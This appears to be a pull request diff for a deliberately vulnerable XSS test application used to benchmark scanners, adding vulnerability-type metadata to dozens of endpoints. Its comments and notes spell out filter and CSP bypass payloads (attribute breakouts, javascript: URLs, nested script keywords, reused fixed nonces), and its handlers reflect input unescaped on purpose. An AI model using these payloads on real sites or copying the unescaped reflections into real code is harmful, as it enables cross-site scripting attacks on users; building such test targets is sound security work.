### PR TITLE
feat(mazes): triage vulnerability metadata for slice T4 (210 endpoints)

### DIFF
--- a/src/mazes/attribute_context_xss.cr
+++ b/src/mazes/attribute_context_xss.cr
@@ -1,6 +1,7 @@
 # Level 1: Reflection in <input type="text" value="QUERY">
 # Bypass: break out with " onmouseover=alert(1) x="
-Xssmaze.push("attrctx-level1", "/attrctx/level1/?query=a", "reflection in input value attribute (double-quoted)")
+Xssmaze.push("attrctx-level1", "/attrctx/level1/?query=a", "reflection in input value attribute (double-quoted)",
+  vuln: "reflected-attr", delivery: ["query"])
 maze_get "/attrctx/level1/" do |env|
   query = env.params.query["query"]
 
@@ -9,7 +10,8 @@ end
 
 # Level 2: Reflection in <a href="QUERY">
 # Bypass: use javascript:alert(1) protocol
-Xssmaze.push("attrctx-level2", "/attrctx/level2/?query=a", "reflection in href attribute (javascript: protocol)")
+Xssmaze.push("attrctx-level2", "/attrctx/level2/?query=a", "reflection in href attribute (javascript: protocol)",
+  vuln: "reflected-attr", delivery: ["query"], note: "reflected into an <a href>; the attribute is unescaped, so a \" breakout fires without the click a javascript: URL would need")
 maze_get "/attrctx/level2/" do |env|
   query = env.params.query["query"]
 
@@ -18,7 +20,8 @@ end
 
 # Level 3: Reflection in <img src="QUERY"> with " encoded to &quot; but ' allowed
 # Bypass: use ' onerror=alert(1) x='
-Xssmaze.push("attrctx-level3", "/attrctx/level3/?query=a", "reflection in img src (double-quote encoded, single-quote allowed)")
+Xssmaze.push("attrctx-level3", "/attrctx/level3/?query=a", "reflection in img src (double-quote encoded, single-quote allowed)",
+  vuln: "reflected-attr", delivery: ["query"], note: "double quotes are entity-encoded, but the attribute is single-quoted, so break out with '")
 maze_get "/attrctx/level3/" do |env|
   query = Filters.escape_double_quote(env.params.query["query"])
 
@@ -27,7 +30,8 @@ end
 
 # Level 4: Reflection in <div style="color: QUERY">
 # Bypass: break out with " onmouseover=alert(1) x="
-Xssmaze.push("attrctx-level4", "/attrctx/level4/?query=a", "reflection in style attribute (double-quoted)")
+Xssmaze.push("attrctx-level4", "/attrctx/level4/?query=a", "reflection in style attribute (double-quoted)",
+  vuln: "reflected-attr", delivery: ["query"])
 maze_get "/attrctx/level4/" do |env|
   query = env.params.query["query"]
 
@@ -36,7 +40,8 @@ end
 
 # Level 5: Reflection in <iframe src="QUERY">
 # Bypass: use javascript:alert(1)
-Xssmaze.push("attrctx-level5", "/attrctx/level5/?query=a", "reflection in iframe src attribute (javascript: protocol)")
+Xssmaze.push("attrctx-level5", "/attrctx/level5/?query=a", "reflection in iframe src attribute (javascript: protocol)",
+  vuln: "reflected-attr", delivery: ["query"], note: "reflected into an <iframe src>; the double-quoted attribute is unescaped, so the breakout is the reliable route rather than the scheme")
 maze_get "/attrctx/level5/" do |env|
   query = env.params.query["query"]
 
@@ -45,7 +50,8 @@ end
 
 # Level 6: Reflection in <input type="hidden" value="QUERY">
 # Bypass: break out with " type=text onfocus=alert(1) autofocus x="
-Xssmaze.push("attrctx-level6", "/attrctx/level6/?query=a", "reflection in hidden input value (type override to trigger focus)")
+Xssmaze.push("attrctx-level6", "/attrctx/level6/?query=a", "reflection in hidden input value (type override to trigger focus)",
+  vuln: "reflected-attr", delivery: ["query"], note: "a hidden input never renders, so the payload has to bring its own trigger, e.g. \" type=text autofocus onfocus=alert(1) x=\"")
 maze_get "/attrctx/level6/" do |env|
   query = env.params.query["query"]
 

--- a/src/mazes/bounty_scanner_xss.cr
+++ b/src/mazes/bounty_scanner_xss.cr
@@ -7,7 +7,8 @@
 # CVE shape: news/blog/SaaS share-preview pages embed a tenant- or
 # query-controlled title into `<meta property="og:title" content="X">`.
 # Quote-context attribute injection — fires on `"><svg onload=...>`.
-Xssmaze.push("scanbounty-level1", "/scanbounty/level1/?title=Welcome", "Open Graph og:title meta content reflection", "GET", ["title"])
+Xssmaze.push("scanbounty-level1", "/scanbounty/level1/?title=Welcome", "Open Graph og:title meta content reflection", "GET", ["title"],
+  vuln: "reflected-html", delivery: ["query"], note: "three reflections — the og:title content attribute, <title> RCDATA and the <h1>; the <h1> is the plain HTML context")
 maze_get "/scanbounty/level1/" do |env|
   title = env.params.query.fetch("title", "Welcome")
 
@@ -21,7 +22,8 @@ end
 # Level 2: pagination param reflected in `<a href>`
 # `?page=2` lands back in `<a href="?page=2">Next</a>` and
 # `<link rel="next">`. Attribute-context — `"><script>` works.
-Xssmaze.push("scanbounty-level2", "/scanbounty/level2/?page=1", "pagination param reflected in next-page link href", "GET", ["page"])
+Xssmaze.push("scanbounty-level2", "/scanbounty/level2/?page=1", "pagination param reflected in next-page link href", "GET", ["page"],
+  vuln: "reflected-html", delivery: ["query"], note: "reflected into <link href>, an <a href> and the paragraph text; the paragraph is the plain HTML context")
 maze_get "/scanbounty/level2/" do |env|
   page = env.params.query.fetch("page", "1")
 
@@ -37,7 +39,8 @@ end
 # `/app?lang=en` apps reflect the locale code into the root `<html
 # lang>` attribute. Attribute breakout with `"><script>` — directly
 # observed in CMS / e-commerce templates.
-Xssmaze.push("scanbounty-level3", "/scanbounty/level3/?lang=en", "<html lang> attribute breakout via locale param", "GET", ["lang"])
+Xssmaze.push("scanbounty-level3", "/scanbounty/level3/?lang=en", "<html lang> attribute breakout via locale param", "GET", ["lang"],
+  vuln: "reflected-html", delivery: ["query"], note: "reflected into the <html lang> attribute and into paragraph text")
 maze_get "/scanbounty/level3/" do |env|
   lang = env.params.query.fetch("lang", "en")
 
@@ -53,7 +56,8 @@ end
 # type="application/ld+json">{...}</script>` with the product / article
 # name pulled from the request. JS-string context inside <script>;
 # `</script><script>alert(1)</script>` closes the block.
-Xssmaze.push("scanbounty-level4", "/scanbounty/level4/?name=Sample", "JSON-LD structured data name field reflection", "GET", ["name"])
+Xssmaze.push("scanbounty-level4", "/scanbounty/level4/?name=Sample", "JSON-LD structured data name field reflection", "GET", ["name"],
+  vuln: "reflected-html", delivery: ["query"], note: "the ld+json block is data, not executable JavaScript; the <h1> copy is the plain HTML context")
 maze_get "/scanbounty/level4/" do |env|
   name = env.params.query.fetch("name", "Sample Product")
 
@@ -68,7 +72,8 @@ end
 # Login / logout / signup pages echo the post-auth destination into
 # the form's `action` attribute and into a "Cancel" link. Attribute
 # breakout — fires on `" autofocus onfocus=alert(1) x="`.
-Xssmaze.push("scanbounty-level5", "/scanbounty/level5/?return_to=/dashboard", "return_to param reflected in form action + cancel link", "GET", ["return_to"])
+Xssmaze.push("scanbounty-level5", "/scanbounty/level5/?return_to=/dashboard", "return_to param reflected in form action + cancel link", "GET", ["return_to"],
+  vuln: "reflected-attr", delivery: ["query"], note: "reflected into the form action and an <a href>, both double-quoted attributes")
 maze_get "/scanbounty/level5/" do |env|
   rt = env.params.query.fetch("return_to", "/")
 
@@ -85,7 +90,8 @@ end
 # Doc / widget hosts allow embedding via `?embed=URL`. Server slots
 # the URL straight into `<iframe src>`. Detect via `javascript:`
 # scheme or `"><svg onload=...>` quote breakout.
-Xssmaze.push("scanbounty-level6", "/scanbounty/level6/?embed=https://example.com", "iframe src from embed= param (scheme + attr breakout)", "GET", ["embed"])
+Xssmaze.push("scanbounty-level6", "/scanbounty/level6/?embed=https://example.com", "iframe src from embed= param (scheme + attr breakout)", "GET", ["embed"],
+  vuln: "reflected-attr", delivery: ["query"])
 maze_get "/scanbounty/level6/" do |env|
   embed = env.params.query.fetch("embed", "about:blank")
 
@@ -100,7 +106,8 @@ end
 # `<img src="https://t.example/p?tag=X">` from the visitor's tag
 # parameter. Image src is a forgiving attribute context — fires on
 # `"><svg onload=...>` and `onerror` payloads.
-Xssmaze.push("scanbounty-level7", "/scanbounty/level7/?tag=newsletter", "tracking pixel src tag reflection", "GET", ["tag"])
+Xssmaze.push("scanbounty-level7", "/scanbounty/level7/?tag=newsletter", "tracking pixel src tag reflection", "GET", ["tag"],
+  vuln: "reflected-attr", delivery: ["query"])
 maze_get "/scanbounty/level7/" do |env|
   tag = env.params.query.fetch("tag", "default")
 
@@ -114,7 +121,8 @@ end
 # CMS themes accept `?color=` and emit `body { background: COLOR; }`
 # into a `<style>` tag. CSS context — closes with `;}</style>
 # <script>...`. Standard CSS-injection / CSS-context scanner payload.
-Xssmaze.push("scanbounty-level8", "/scanbounty/level8/?color=blue", "theme color reflected into inline <style>", "GET", ["color"])
+Xssmaze.push("scanbounty-level8", "/scanbounty/level8/?color=blue", "theme color reflected into inline <style>", "GET", ["color"],
+  vuln: "reflected-html", delivery: ["query"], note: "lands inside an inline <style> block; close it with </style> to reach an HTML context")
 maze_get "/scanbounty/level8/" do |env|
   color = env.params.query.fetch("color", "white")
 

--- a/src/mazes/chained_filter_xss.cr
+++ b/src/mazes/chained_filter_xss.cr
@@ -1,5 +1,6 @@
 # Level 1: Strip "script" keyword, but <> are NOT stripped so other tags work
-Xssmaze.push("chain-level1", "/chain/level1/?query=a", "strip script keyword only (other tags survive)")
+Xssmaze.push("chain-level1", "/chain/level1/?query=a", "strip script keyword only (other tags survive)",
+  vuln: "reflected-html", delivery: ["query"], note: "\"script\" is removed case-insensitively in a single pass, so <scrscriptipt> rejoins into <script>")
 maze_get "/chain/level1/" do |env|
   query = env.params.query["query"]
   filtered = query.gsub(/script/i, "")
@@ -8,7 +9,8 @@ maze_get "/chain/level1/" do |env|
 end
 
 # Level 2: Lowercase input + strip <script (other tags like <img survive)
-Xssmaze.push("chain-level2", "/chain/level2/?query=a", "lowercase + strip <script (other tags survive)")
+Xssmaze.push("chain-level2", "/chain/level2/?query=a", "lowercase + strip <script (other tags survive)",
+  vuln: "reflected-html", delivery: ["query"], note: "the value is lowercased and \"<script\" removed; other tags survive")
 maze_get "/chain/level2/" do |env|
   query = env.params.query["query"]
   filtered = query.downcase.gsub("<script", "")
@@ -17,7 +19,8 @@ maze_get "/chain/level2/" do |env|
 end
 
 # Level 3: Replace alert with blocked (use confirm/prompt instead)
-Xssmaze.push("chain-level3", "/chain/level3/?query=a", "replace alert with blocked (confirm/prompt bypass)")
+Xssmaze.push("chain-level3", "/chain/level3/?query=a", "replace alert with blocked (confirm/prompt bypass)",
+  vuln: "reflected-html", delivery: ["query"], note: "\"alert\" becomes \"blocked\"; confirm/prompt are untouched")
 maze_get "/chain/level3/" do |env|
   query = env.params.query["query"]
   filtered = query.gsub(/alert/i, "blocked")
@@ -26,7 +29,8 @@ maze_get "/chain/level3/" do |env|
 end
 
 # Level 4: Case-sensitive tag strip <[a-z]+ only (uppercase tags bypass)
-Xssmaze.push("chain-level4", "/chain/level4/?query=a", "case-sensitive lowercase tag strip (uppercase tags bypass)")
+Xssmaze.push("chain-level4", "/chain/level4/?query=a", "case-sensitive lowercase tag strip (uppercase tags bypass)",
+  vuln: "reflected-html", delivery: ["query"], note: "only lowercase <tag openers are stripped, so uppercase tag names survive")
 maze_get "/chain/level4/" do |env|
   query = env.params.query["query"]
   filtered = query.gsub(/<[a-z]+/, "")
@@ -35,7 +39,8 @@ maze_get "/chain/level4/" do |env|
 end
 
 # Level 5: Replace = with &#61; HTML entity (browser decodes in event handlers)
-Xssmaze.push("chain-level5", "/chain/level5/?query=a", "replace = with HTML entity &#61; (browser decodes in handlers)")
+Xssmaze.push("chain-level5", "/chain/level5/?query=a", "replace = with HTML entity &#61; (browser decodes in handlers)",
+  vuln: "reflected-html", delivery: ["query"], note: "= becomes &#61;, which a browser does not decode inside an attribute *name*, so handler payloads break — but <script>alert(1)</script> contains no = at all")
 maze_get "/chain/level5/" do |env|
   query = env.params.query["query"]
   filtered = query.gsub("=", "&#61;")
@@ -44,7 +49,8 @@ maze_get "/chain/level5/" do |env|
 end
 
 # Level 6: Strip // and /* JS comments, reflect in JS string (close script tag to bypass)
-Xssmaze.push("chain-level6", "/chain/level6/?query=a", "strip JS comments in script string context (close tag bypass)")
+Xssmaze.push("chain-level6", "/chain/level6/?query=a", "strip JS comments in script string context (close tag bypass)",
+  vuln: "reflected-js", delivery: ["query"], note: "// and /* are stripped; </script> contains neither and still closes the block")
 maze_get "/chain/level6/" do |env|
   query = env.params.query["query"]
   filtered = query.gsub("//", "").gsub("/*", "")

--- a/src/mazes/complex_page_xss.cr
+++ b/src/mazes/complex_page_xss.cr
@@ -1,5 +1,6 @@
 # Level 1: Full page with header/nav/main/footer, query reflected in main content div
-Xssmaze.push("complexpage-level1", "/complexpage/level1/?query=a", "full page with header/nav/footer, reflection in content div")
+Xssmaze.push("complexpage-level1", "/complexpage/level1/?query=a", "full page with header/nav/footer, reflection in content div",
+  vuln: "reflected-html", delivery: ["query"])
 maze_get "/complexpage/level1/" do |env|
   query = env.params.query["query"]
 
@@ -18,7 +19,8 @@ maze_get "/complexpage/level1/" do |env|
 end
 
 # Level 2: Full page with sidebar, query reflected in search input value
-Xssmaze.push("complexpage-level2", "/complexpage/level2/?query=a", "full page with sidebar, reflection in search input value")
+Xssmaze.push("complexpage-level2", "/complexpage/level2/?query=a", "full page with sidebar, reflection in search input value",
+  vuln: "reflected-attr", delivery: ["query"])
 maze_get "/complexpage/level2/" do |env|
   query = env.params.query["query"]
 
@@ -41,7 +43,8 @@ maze_get "/complexpage/level2/" do |env|
 end
 
 # Level 3: Full page with multiple scripts, query reflected in h2 title
-Xssmaze.push("complexpage-level3", "/complexpage/level3/?query=a", "full page with multiple scripts, reflection in h2 title")
+Xssmaze.push("complexpage-level3", "/complexpage/level3/?query=a", "full page with multiple scripts, reflection in h2 title",
+  vuln: "reflected-html", delivery: ["query"])
 maze_get "/complexpage/level3/" do |env|
   query = env.params.query["query"]
 
@@ -63,7 +66,8 @@ maze_get "/complexpage/level3/" do |env|
 end
 
 # Level 4: Full page with CSS, query reflected in paragraph description
-Xssmaze.push("complexpage-level4", "/complexpage/level4/?query=a", "full page with CSS styles, reflection in description paragraph")
+Xssmaze.push("complexpage-level4", "/complexpage/level4/?query=a", "full page with CSS styles, reflection in description paragraph",
+  vuln: "reflected-html", delivery: ["query"])
 maze_get "/complexpage/level4/" do |env|
   query = env.params.query["query"]
 
@@ -89,7 +93,8 @@ h1 { color: #333; border-bottom: 2px solid #0066cc; padding-bottom: 10px; }
 end
 
 # Level 5: Full page with forms and tables, query reflected in table data cell
-Xssmaze.push("complexpage-level5", "/complexpage/level5/?query=a", "full page with forms and tables, reflection in td element")
+Xssmaze.push("complexpage-level5", "/complexpage/level5/?query=a", "full page with forms and tables, reflection in td element",
+  vuln: "reflected-html", delivery: ["query"])
 maze_get "/complexpage/level5/" do |env|
   query = env.params.query["query"]
 
@@ -115,7 +120,8 @@ maze_get "/complexpage/level5/" do |env|
 end
 
 # Level 6: Full page with lots of HTML (>1000 chars before reflection), query deep in page
-Xssmaze.push("complexpage-level6", "/complexpage/level6/?query=a", "large page with reflection deep in HTML (>1000 chars before reflection)")
+Xssmaze.push("complexpage-level6", "/complexpage/level6/?query=a", "large page with reflection deep in HTML (>1000 chars before reflection)",
+  vuln: "reflected-html", delivery: ["query"], note: "the reflection sits about a kilobyte into the document, after the nav and sidebar markup")
 maze_get "/complexpage/level6/" do |env|
   query = env.params.query["query"]
 

--- a/src/mazes/csp_bypass.cr
+++ b/src/mazes/csp_bypass.cr
@@ -1,4 +1,5 @@
-Xssmaze.push("csp-bypass-level1", "/csp/level1/?query=a", "CSP bypass with unsafe-inline")
+Xssmaze.push("csp-bypass-level1", "/csp/level1/?query=a", "CSP bypass with unsafe-inline",
+  vuln: "reflected-html", delivery: ["query"], note: "script-src 'unsafe-inline', so an injected inline <script> executes")
 maze_get "/csp/level1/" do |env|
   query = env.params.query["query"]
   env.response.headers["Content-Security-Policy"] = "default-src 'self'; script-src 'unsafe-inline'"
@@ -9,7 +10,8 @@ maze_get "/csp/level1/" do |env|
   </body></html>"
 end
 
-Xssmaze.push("csp-bypass-level2", "/csp/level2/?query=a", "CSP bypass with nonce")
+Xssmaze.push("csp-bypass-level2", "/csp/level2/?query=a", "CSP bypass with nonce",
+  vuln: "reflected-js", delivery: ["query"], note: "the reflection is inside a nonce'd inline <script>, so breaking the single-quoted string runs under that nonce; the nonce is the fixed literal abc123, so an injected <script nonce='abc123'> passes too")
 maze_get "/csp/level2/" do |env|
   query = env.params.query["query"]
   nonce = "abc123"
@@ -23,7 +25,8 @@ maze_get "/csp/level2/" do |env|
   </body></html>"
 end
 
-Xssmaze.push("csp-bypass-level3", "/csp/level3/?query=a", "CSP bypass with eval and unsafe-eval")
+Xssmaze.push("csp-bypass-level3", "/csp/level3/?query=a", "CSP bypass with eval and unsafe-eval",
+  vuln: "non-xss-control", delivery: ["query"], exploitable: false, note: "the value does land raw in a JS string, but script-src 'unsafe-eval' carries no 'unsafe-inline', nonce or host source, so the page's own inline <script> never runs and no injected script or event handler can run either; reporting no XSS here is the correct result")
 maze_get "/csp/level3/" do |env|
   query = env.params.query["query"]
   env.response.headers["Content-Security-Policy"] = "default-src 'self'; script-src 'unsafe-eval'"
@@ -36,7 +39,8 @@ maze_get "/csp/level3/" do |env|
   </body></html>"
 end
 
-Xssmaze.push("csp-bypass-level4", "/csp/level4/?query=a", "CSP bypass with strict policy (data: URI)")
+Xssmaze.push("csp-bypass-level4", "/csp/level4/?query=a", "CSP bypass with strict policy (data: URI)",
+  vuln: "non-xss-control", delivery: ["query"], exploitable: false, note: "default-src 'self' blocks the data: iframe that would carry the payload and script-src 'self' blocks the inline listener that would render it, so neither half of the postMessage round-trip executes")
 maze_get "/csp/level4/" do |env|
   query = env.params.query["query"]
   env.response.headers["Content-Security-Policy"] = "default-src 'self'; script-src 'self'"
@@ -52,7 +56,8 @@ maze_get "/csp/level4/" do |env|
   </body></html>"
 end
 
-Xssmaze.push("csp-bypass-level5", "/csp/level5/?query=a", "CSP bypass with meta tag injection")
+Xssmaze.push("csp-bypass-level5", "/csp/level5/?query=a", "CSP bypass with meta tag injection",
+  vuln: "reflected-html", delivery: ["query"], note: "the meta-tag CSP allows 'unsafe-inline', so the raw reflection executes")
 maze_get "/csp/level5/" do |env|
   query = env.params.query["query"]
 

--- a/src/mazes/csp_bypass_xss.cr
+++ b/src/mazes/csp_bypass_xss.cr
@@ -1,5 +1,6 @@
 # Level 1: CSP script-src 'unsafe-inline' - raw reflection, scripts execute because of unsafe-inline
-Xssmaze.push("cspbypass-level1", "/cspbypass/level1/?query=a", "CSP unsafe-inline allows raw script injection")
+Xssmaze.push("cspbypass-level1", "/cspbypass/level1/?query=a", "CSP unsafe-inline allows raw script injection",
+  vuln: "reflected-html", delivery: ["query"], note: "script-src 'unsafe-inline', so an injected inline <script> executes")
 maze_get "/cspbypass/level1/" do |env|
   query = env.params.query["query"]
   env.response.headers["Content-Security-Policy"] = "default-src 'self'; script-src 'unsafe-inline'"
@@ -11,7 +12,8 @@ maze_get "/cspbypass/level1/" do |env|
 end
 
 # Level 2: CSP default-src 'self' but query reflected inside existing <script nonce="..."> block as a string - break out of string context
-Xssmaze.push("cspbypass-level2", "/cspbypass/level2/?query=a", "CSP nonce script with reflection in JS string context")
+Xssmaze.push("cspbypass-level2", "/cspbypass/level2/?query=a", "CSP nonce script with reflection in JS string context",
+  vuln: "reflected-js", delivery: ["query"], note: "reflected inside a nonce'd inline <script>; break the double-quoted string to run under the nonce, which is the fixed literal r4nd0mN0nc3")
 maze_get "/cspbypass/level2/" do |env|
   query = env.params.query["query"]
   nonce = "r4nd0mN0nc3"
@@ -27,7 +29,8 @@ maze_get "/cspbypass/level2/" do |env|
 end
 
 # Level 3: CSP with script-src 'self' 'unsafe-eval' and reflection in JS string that gets eval'd - close script tag, inject HTML
-Xssmaze.push("cspbypass-level3", "/cspbypass/level3/?query=a", "CSP unsafe-eval with reflection in eval'd JS string")
+Xssmaze.push("cspbypass-level3", "/cspbypass/level3/?query=a", "CSP unsafe-eval with reflection in eval'd JS string",
+  vuln: "non-xss-control", delivery: ["query"], exploitable: false, note: "script-src 'self' 'unsafe-eval' carries no 'unsafe-inline', so the inline <script> holding the reflection never executes and an injected script or event handler is blocked as well; reporting no XSS here is the correct result")
 maze_get "/cspbypass/level3/" do |env|
   query = env.params.query["query"]
   env.response.headers["Content-Security-Policy"] = "default-src 'self'; script-src 'self' 'unsafe-eval'"
@@ -42,7 +45,8 @@ maze_get "/cspbypass/level3/" do |env|
 end
 
 # Level 4: No CSP header at all, but <script> tag stripped (single pass) - use nested tag trick or <img> tag
-Xssmaze.push("cspbypass-level4", "/cspbypass/level4/?query=a", "no CSP but single-pass script tag strip")
+Xssmaze.push("cspbypass-level4", "/cspbypass/level4/?query=a", "no CSP but single-pass script tag strip",
+  vuln: "reflected-html", delivery: ["query"], note: "<script> and </script> are stripped in a single pass; use another tag or nest the keyword")
 maze_get "/cspbypass/level4/" do |env|
   query = env.params.query["query"]
   # Single-pass removal of <script> and </script> tags
@@ -55,7 +59,8 @@ maze_get "/cspbypass/level4/" do |env|
 end
 
 # Level 5: CSP script-src 'unsafe-inline' with query reflected in <script> block, only 'alert' keyword is stripped
-Xssmaze.push("cspbypass-level5", "/cspbypass/level5/?query=a", "CSP unsafe-inline with alert keyword stripped")
+Xssmaze.push("cspbypass-level5", "/cspbypass/level5/?query=a", "CSP unsafe-inline with alert keyword stripped",
+  vuln: "reflected-js", delivery: ["query"], note: "\"alert\" is stripped case-insensitively; 'unsafe-inline' is set, so a </script> breakout works as well as a string breakout")
 maze_get "/cspbypass/level5/" do |env|
   query = env.params.query["query"]
   filtered = query.gsub(/alert/i, "")
@@ -70,7 +75,8 @@ maze_get "/cspbypass/level5/" do |env|
 end
 
 # Level 6: CSP header present but misconfigured: script-src * (allows everything) - raw reflection
-Xssmaze.push("cspbypass-level6", "/cspbypass/level6/?query=a", "CSP misconfigured with script-src * allowing all scripts")
+Xssmaze.push("cspbypass-level6", "/cspbypass/level6/?query=a", "CSP misconfigured with script-src * allowing all scripts",
+  vuln: "reflected-html", delivery: ["query"], note: "script-src * matches URL sources only — an inline <script> or event handler is still blocked, so the payload has to load an external script, e.g. <script src=//host/x.js></script>")
 maze_get "/cspbypass/level6/" do |env|
   query = env.params.query["query"]
   env.response.headers["Content-Security-Policy"] = "default-src 'self'; script-src *"

--- a/src/mazes/double_reflection_xss.cr
+++ b/src/mazes/double_reflection_xss.cr
@@ -1,5 +1,6 @@
 # Level 1: Query reflected twice in HTML body
-Xssmaze.push("doublereflect-level1", "/doublereflect/level1/?query=a", "query reflected twice in body")
+Xssmaze.push("doublereflect-level1", "/doublereflect/level1/?query=a", "query reflected twice in body",
+  vuln: "reflected-html", delivery: ["query"], note: "the same value is reflected twice into paragraph text")
 maze_get "/doublereflect/level1/" do |env|
   query = env.params.query["query"]
 
@@ -11,7 +12,8 @@ maze_get "/doublereflect/level1/" do |env|
 end
 
 # Level 2: Query reflected raw in body AND in attribute with " encoded
-Xssmaze.push("doublereflect-level2", "/doublereflect/level2/?query=a", "body raw + attribute with quotes encoded")
+Xssmaze.push("doublereflect-level2", "/doublereflect/level2/?query=a", "body raw + attribute with quotes encoded",
+  vuln: "reflected-html", delivery: ["query"], note: "the input value attribute entity-encodes double quotes; the div copy is raw")
 maze_get "/doublereflect/level2/" do |env|
   query = env.params.query["query"]
   attr_escaped = query.gsub("\"", "&quot;")
@@ -24,7 +26,8 @@ maze_get "/doublereflect/level2/" do |env|
 end
 
 # Level 3: First reflection has <> encoded, second reflection is raw — second is exploitable
-Xssmaze.push("doublereflect-level3", "/doublereflect/level3/?query=a", "first reflection encoded, second raw")
+Xssmaze.push("doublereflect-level3", "/doublereflect/level3/?query=a", "first reflection encoded, second raw",
+  vuln: "reflected-html", delivery: ["query"], note: "the first copy entity-encodes angle brackets; the second is raw")
 maze_get "/doublereflect/level3/" do |env|
   query = env.params.query["query"]
   encoded = Filters.encode_angles(query)
@@ -37,7 +40,8 @@ maze_get "/doublereflect/level3/" do |env|
 end
 
 # Level 4: Query reflected in <title> AND <body> — both exploitable
-Xssmaze.push("doublereflect-level4", "/doublereflect/level4/?query=a", "reflection in title + body")
+Xssmaze.push("doublereflect-level4", "/doublereflect/level4/?query=a", "reflection in title + body",
+  vuln: "reflected-html", delivery: ["query"], note: "the <title> copy is RCDATA; the div copy is a plain HTML context")
 maze_get "/doublereflect/level4/" do |env|
   query = env.params.query["query"]
 
@@ -50,7 +54,8 @@ maze_get "/doublereflect/level4/" do |env|
 end
 
 # Level 5: Query reflected 5 times: 4 with HTML encoding, 1 raw at the end
-Xssmaze.push("doublereflect-level5", "/doublereflect/level5/?query=a", "4 encoded reflections + 1 raw at end")
+Xssmaze.push("doublereflect-level5", "/doublereflect/level5/?query=a", "4 encoded reflections + 1 raw at end",
+  vuln: "reflected-html", delivery: ["query"], note: "four copies entity-encode angle brackets; only the fifth is raw")
 maze_get "/doublereflect/level5/" do |env|
   query = env.params.query["query"]
   encoded = Filters.encode_angles(query)
@@ -66,7 +71,8 @@ maze_get "/doublereflect/level5/" do |env|
 end
 
 # Level 6: First reflection in script string (with " escaped), second in div raw
-Xssmaze.push("doublereflect-level6", "/doublereflect/level6/?query=a", "script string (quotes escaped) + div raw")
+Xssmaze.push("doublereflect-level6", "/doublereflect/level6/?query=a", "script string (quotes escaped) + div raw",
+  vuln: "reflected-html", delivery: ["query"], note: "the <script> copy escapes double quotes but not </script>; the div copy is raw")
 maze_get "/doublereflect/level6/" do |env|
   query = env.params.query["query"]
   js_escaped = query.gsub("\"", "\\\"")

--- a/src/mazes/edge_case_xss.cr
+++ b/src/mazes/edge_case_xss.cr
@@ -1,5 +1,6 @@
 # Level 1: Null byte injection (%00 before filter check)
-Xssmaze.push("edge-level1", "/edge/level1/?query=a", "null byte before filter")
+Xssmaze.push("edge-level1", "/edge/level1/?query=a", "null byte before filter",
+  vuln: "reflected-html", delivery: ["query"], note: "the angle-bracket check only inspects the bytes before the first NUL, so a %00 prefix carries the payload past it unfiltered")
 maze_get "/edge/level1/" do |env|
   query = env.params.query["query"]
   # Strip everything after null byte for filter, but reflect original
@@ -12,7 +13,8 @@ maze_get "/edge/level1/" do |env|
 end
 
 # Level 2: Path traversal style /../ removal, but XSS in path
-Xssmaze.push("edge-level2", "/edge/level2/test", "path segment reflection")
+Xssmaze.push("edge-level2", "/edge/level2/test", "path segment reflection", "GET", [":path"],
+  vuln: "reflected-html", delivery: ["path"], note: "the payload is the URL path segment, not a query parameter")
 maze_get "/edge/level2/:segment" do |env|
   seg = env.params.url["segment"]
 
@@ -20,7 +22,8 @@ maze_get "/edge/level2/:segment" do |env|
 end
 
 # Level 3: Reflection in JSON-in-HTML (inside <script type="application/json">)
-Xssmaze.push("edge-level3", "/edge/level3/?query=a", "JSON island in script tag")
+Xssmaze.push("edge-level3", "/edge/level3/?query=a", "JSON island in script tag",
+  vuln: "dom", sources: ["server-reflected"], sinks: ["innerHTML"], delivery: ["query"], note: "the value is placed in a <script type=application/json> island with its double quotes escaped, then JSON.parse'd and written with innerHTML — a tag payload reaches the sink with no breakout")
 maze_get "/edge/level3/" do |env|
   query = env.params.query["query"]
   escaped = query.gsub("\"", "\\\"")
@@ -38,7 +41,8 @@ end
 
 # Level 4: Reflection with HTML entity encoded output but in dangerous context
 # Server encodes <> to entities, but reflects in onclick - browser decodes entities in attribute
-Xssmaze.push("edge-level4", "/edge/level4/?query=a", "HTML entity in event handler attribute")
+Xssmaze.push("edge-level4", "/edge/level4/?query=a", "HTML entity in event handler attribute",
+  vuln: "reflected-attr", delivery: ["query"], note: "angle brackets are entity-encoded, but the value sits in a single-quoted JS string inside an onclick handler; the handler only runs on click, so break out of the double-quoted attribute to inject a self-firing tag")
 maze_get "/edge/level4/" do |env|
   query = Filters.encode_angles(env.params.query["query"])
 
@@ -46,7 +50,8 @@ maze_get "/edge/level4/" do |env|
 end
 
 # Level 5: Multiline reflection (payload split across lines)
-Xssmaze.push("edge-level5", "/edge/level5/?q1=a&q2=b", "split payload across two params")
+Xssmaze.push("edge-level5", "/edge/level5/?q1=a&q2=b", "split payload across two params", "GET", ["q1", "q2"],
+  vuln: "reflected-attr", delivery: ["query"], note: "the payload is split across two parameters concatenated into one title attribute")
 maze_get "/edge/level5/" do |env|
   q1 = env.params.query.fetch("q1", "a")
   q2 = env.params.query.fetch("q2", "b")
@@ -55,7 +60,8 @@ maze_get "/edge/level5/" do |env|
 end
 
 # Level 6: Reflection in SVG attribute
-Xssmaze.push("edge-level6", "/edge/level6/?query=a", "SVG fill attribute injection")
+Xssmaze.push("edge-level6", "/edge/level6/?query=a", "SVG fill attribute injection",
+  vuln: "reflected-attr", delivery: ["query"], note: "reflected into an SVG <rect fill>; inside <svg> an injected <script> is an SVG script element and still runs")
 maze_get "/edge/level6/" do |env|
   query = env.params.query["query"]
 
@@ -63,7 +69,8 @@ maze_get "/edge/level6/" do |env|
 end
 
 # Level 7: Triple parameter concatenation in JS
-Xssmaze.push("edge-level7", "/edge/level7/?a=x&b=y&c=z", "triple param concat in JS string")
+Xssmaze.push("edge-level7", "/edge/level7/?a=x&b=y&c=z", "triple param concat in JS string", "GET", ["a", "b", "c"],
+  vuln: "reflected-js", delivery: ["query"], note: "three parameters are concatenated into one single-quoted JS string")
 maze_get "/edge/level7/" do |env|
   a = env.params.query.fetch("a", "x")
   b = env.params.query.fetch("b", "y")
@@ -73,7 +80,8 @@ maze_get "/edge/level7/" do |env|
 end
 
 # Level 8: Reflection in textarea with </textarea> not stripped
-Xssmaze.push("edge-level8", "/edge/level8/?query=a", "textarea body (close tag allowed)")
+Xssmaze.push("edge-level8", "/edge/level8/?query=a", "textarea body (close tag allowed)",
+  vuln: "reflected-html", delivery: ["query"], note: "reflected into <textarea> RCDATA; close </textarea> first")
 maze_get "/edge/level8/" do |env|
   query = env.params.query["query"]
 

--- a/src/mazes/embed_context_xss.cr
+++ b/src/mazes/embed_context_xss.cr
@@ -1,6 +1,7 @@
 # Level 1: Reflected in <object data="QUERY" type="text/html">
